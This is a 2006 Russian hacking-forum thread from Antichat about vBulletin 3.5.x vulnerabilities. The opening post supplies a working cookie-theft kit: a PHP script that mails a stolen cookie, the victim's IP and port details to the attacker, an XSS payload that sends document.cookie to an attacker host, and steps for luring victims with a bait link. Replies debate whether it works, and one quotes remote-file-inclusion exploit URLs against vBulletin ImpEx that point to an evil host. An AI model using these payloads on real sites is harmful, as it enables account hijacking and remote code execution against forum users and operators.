Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Уязвимости в vBulletin v3.5.x ( test: v3.5.4 ) |
20.04.2006, 18:06
|
|
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995
Репутация:
17
|
|
Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
работает отлично! 
Код:
( 1 )
--------------------------------------------------------------------
Name file: exploit.php
--------------------------------------------------------------------
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>
<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$cookie = $_GET['c'];
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
--------------------------------------------------------------------
<?php
$myemail = "YOUR ADDRESS E-MAIL";
--------------------------------------------------------------------
( 2 )
--------------------------------------------------------------------
Name file: image.gif
--------------------------------------------------------------------
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >
--------------------------------------------------------------------
location="http://YOUR ADDRESS WEB.com
--------------------------------------------------------------------
( 3 )
--------------------------------------------------------------------
Like Using
--------------------------------------------------------------------
1° new thread
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3° Submit
4° It waits for
--------------------------------------------------------------------
|
|
|
20.04.2006, 19:31
|
|
Познающий
Регистрация: 22.10.2005
Сообщений: 37
Провел на форуме:
520745
Репутация:
141
|
|
Видимо, работает только при разрешённых html тэгах.
ИМХО - лажа
|
|
|
|
20.04.2006, 19:31
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607
Репутация:
454
|
|
что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?
|
|
|
|
20.04.2006, 21:14
|
|
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995
Репутация:
17
|
|
Сообщение от VectorG
что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?
video нужнa ?
|
|
|
|
20.04.2006, 21:23
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
liauliau - давай сними им видео а то до них это всё плохо доходит...
|
|
|
|
20.04.2006, 21:24
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656
Репутация:
22
|
|
слушай реально сними видео.=)
|
|
|
|
20.04.2006, 21:55
|
|
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995
Репутация:
17
|
|
Сообщение от Lord Nikon
слушай реально сними видео.=)
ok 1min
|
|
|
|
20.04.2006, 21:57
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS
сплойт гавно
|
|
|
|
20.04.2006, 22:23
|
|
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995
Репутация:
17
|
|
|
|
|
|
20.04.2006, 22:37
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Всё бы здорово если бы не html on.
Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
Код:
Remote File Inclusion in VBulletin ImpEx
Date :
12 / 4 / 2006
Software :
VBulletin ImpEx
version :
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4
The bug reside in :
ImpExModule.php
ImpExController.php
ImpExDisplay.php
Exploit :
(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
Discovery by :
Dr.Jr7
GreeTz :
special greet to Qptan & Mr.SNAKE & trooq
and to my all frinds in www.lezr.com/vb
see u :}
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
